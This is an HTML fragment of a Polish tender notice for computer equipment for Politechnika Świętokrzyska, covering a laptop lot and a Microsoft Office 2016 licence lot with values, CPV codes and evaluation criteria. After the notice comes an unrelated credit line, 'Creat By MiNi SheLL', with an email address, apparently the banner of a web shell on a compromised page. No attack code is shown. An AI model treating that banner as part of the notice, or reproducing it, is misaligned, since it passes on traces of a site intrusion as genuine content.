                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego Komputera przenośnego (Procesor : 2 rdzenie zakres pracy od 2,3 do 2,8 GHz, Pamięć RAM 8 GB DDR3 1600 MHz, Dysk twardy 256 GB SSD SATA III, Ekran błyszczący (glare) dotykowy 15,6, 1920x1080 (FullHD), wielkość  pamięci karty graficznej 2048MB (pamięć własna); dźwięk: wbudowane głośniki stero, mikrofon, zintegrowana karta dźwiękowa; kamera internetowa 1.0 Mpix; łączność LAN 1 Gbps, Bluetooth, WiFi IEEE 802.11b/g/n; wejścia wyjścia: 1x USB, 2x USB 3.0, 1x HDMI, 1x czytnik kart pamięci, słuchawki/mikrofon; bateria 3-komorowa, 4300 mAh, waga max. 2,5 kg z baterią, Sztuk 1).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  2439.02<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Dostawa sprzętu komputerowego dla Politechniki Świętokrzyskiej (Microsoft Office Professional 2016)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego Oprogramowania (Microsoft Office Professional 2016, wersja polskojęzyczna, box na min. 1 stanowisko, 1 licencja)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30213000-5, 30232110-8,
                    48771000-3,
                    48310000-4,
                    32582000-6,
                    30233132-5,
                    30232130-4,
                    30213100-6,
                    30237270-2,
                    30213300-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  325.20<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Okres gwarancji</td><td>20.00</td></tr><tr><td>Termin dostawy</td><td>20.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com